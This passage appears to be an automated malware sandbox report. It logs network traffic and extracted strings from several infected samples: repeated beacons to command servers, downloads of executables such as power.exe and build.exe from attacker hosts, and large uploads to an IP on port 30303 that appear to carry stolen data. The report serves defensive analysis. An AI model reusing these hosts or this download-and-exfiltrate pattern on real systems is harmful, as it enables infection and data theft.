                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxvorcn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pppdb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shwsp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyuaut.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://waofgmma.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtnvc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lfcxfryvi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcovw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dpvseurycv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqqtqnj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykcanuky.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wuwnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyabnclq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----3100769260389402User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131253Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyrfgkau.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uytll.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxhhlcn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://laydyxa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oluqgvm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lugojs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aomtmlmpuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cfjtxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbcht.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akimoe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlaxujokn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dmcdswi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=436160&key=a96ab7e5e6412d32675599dfaebc13f6 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Content-Length: 256Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgfsyqph.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmewqwgqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dsoav.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ollfl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylfleydl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----3539298648004245User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 137965Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etftmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /cc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.180.48.90
                Source: global trafficHTTP traffic detected: POST /check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Content-Length: 256Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fglqosxf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1260409671928259User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131701Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlcjnrapy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fatvkcvmxq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7167690855263849User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131773Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vacsrkw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cdgmadwmn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vplsfigg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7208179365116563User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131529Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doqsqrp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nypsigtije.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjgjontf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atqoikuxkw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9595889800188942User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131505Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://octqh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=436336&key=3f9d01718af2d5daf3c654f2052d5bc7 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Content-Length: 256Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xgeaptg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2526816168050978User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131493Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7433048622556332User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131477Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1728351691547648User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 131473Connection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK
                Source: Joe Sandbox ViewIP Address: 103.100.211.218 103.100.211.218
                Source: Joe Sandbox ViewIP Address: 103.100.211.218 103.100.211.218
                Source: global trafficTCP traffic: 192.168.2.3:49734 -> 188.34.154.187:30303
                Source: unknownNetwork traffic detected: IP country count 11
                Source: D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe
                Source: D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe$run
                Source: D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exerun3
                Source: explorer.exe, 00000001.00000000.378821866.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
                Source: explorer.exe, 00000001.00000000.378821866.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
                Source: D804.exe, 00000006.00000003.443656500.0000000000780000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000006.00000003.443731169.0000000000780000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000006.00000003.445331389.000000000077F000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000006.00000002.450438133.000000000077D000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000003.452471512.0000000000851000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000002.619429561.0000000000852000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.569252099.000001E2901E8000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.572224446.000001E2901E8000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.539122814.000001E2901E8000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566021117.000001E2901E8000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559161122.000001E2901E8000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.562531602.000001E2901E8000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2901E8000.00000004.00000001.00020000.00000000.sdmp, B46F.exe, 0000001A.00000003.479306227.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000003.488086932.0000000000939000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000002.490407985.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
